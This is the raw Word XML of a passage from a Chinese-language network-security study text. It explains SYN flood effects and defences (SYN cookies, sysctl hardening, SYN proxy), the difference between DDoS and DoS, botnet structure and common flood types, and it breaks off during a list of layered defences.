    <w:p w14:paraId="4427FCDF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="480" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CD68B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚假</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会回复</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（第三次握手永远不会完成）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F8309" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器连接队列被占满</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932E9BA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常用户无法建立新连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D6F45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实际危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE276B8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务瘫痪（显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接超时</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F143B7" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务中断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF9946" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙因连接数过载崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167EB72" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复时间长达数小时防御方案（分层防护）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC04628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防御方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D507341" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术（最有效）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52624EDE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器不立即分配资源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207874B7" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将连接信息加密在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN-ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包的序列号中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482250B2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收到合法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才创建连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E89B0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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接限制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C751AA5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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C39DB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># Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>系统加固</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25946199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 xml:space="preserve">sysctl -w net.ipv4.tcp_max_syn_backlog=2048  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>增大队列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870F8A8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 xml:space="preserve">sysctl -w net.ipv4.tcp_synack_retries=2      # </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>减少重试次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31002936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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙策略：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39D0D6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启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理（防火墙代替服务器响应）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D81E0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设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包速率阈值（超过即阻断）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103C4A04" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0348C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DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>核心区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CC86F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DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：单攻击源（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>台电脑攻击）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842219E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DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：分布式攻击（数万台僵尸设备协同攻击）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C107555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攻击原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E71E391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>黑客控制中心</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>僵尸网络（肉鸡）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22341987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 xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C42097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>肉鸡</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>号</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>攻击流量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>目标服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562324CF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>肉鸡</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>号</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>攻击流量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>目标服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47FEE1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>...</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>（数万台同时攻击）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09C3DE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典型攻击类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC1C74" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络层</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP Flood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP Flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC4AE8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输层</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACK Flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68628C08" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>应用层</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Flood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（模拟用户访问）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A30286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防御体系（三层防护）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A48C92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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB1983A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器性能优化（增大连接数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29C516" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭不必要服务（减少攻击面）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A9291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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
